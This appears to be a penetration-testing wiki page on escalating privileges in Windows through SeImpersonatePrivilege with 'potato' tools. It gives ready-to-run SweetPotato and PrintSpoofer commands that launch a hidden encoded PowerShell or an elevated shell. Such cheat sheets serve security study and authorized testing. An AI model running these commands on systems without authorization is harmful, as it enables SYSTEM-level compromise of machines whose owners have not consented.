search
Personal BlogTwitterGitHubContact

SeImpersonatePrivilege

hashtag
Potatoes

Potatoes are a common way to escalate privileges on a Windows system after either theSeImpersonate or SeAssignPrimaryToken privileges have been enumerated. This can be accomplished quickly by running the following command:

whoami /priv

hashtag
Sweet Potato

As noted by Jorge Lajaraarrow-up-right, Sweet Potatoarrow-up-right is one of the most successful potatoes to escalate privileges with. It contains the following exploits built-in to it, rendering the other potatoes obsolete:

  • RottenPotato

  • Weaponized JuicyPotato with BITS WinRM discovery

  • PrintSpoofer

  • EfsRpc built on EfsPotato

  • PetitPotam

# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"

hashtag
PrintSpoofer

# Verify that the Print Spooler service is running
Get-Service Spooler

# Run the PrintSpoofer executable to escalate privileges
.\PrintSpoofer.exe -i -c powershell

hashtag
References

LogoJorge Lajara WebsiteJorge Lajara Websitechevron-right
Guidance on using Potatoes
LogoGitHub - itm4n/PrintSpoofer: Abusing impersonation privileges through the "Printer Bug"GitHubchevron-right
LogoPrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019itm4n’s blogchevron-right
PreviousPrivilege AbuseNextSeLoadDriverPrivilege

Last updated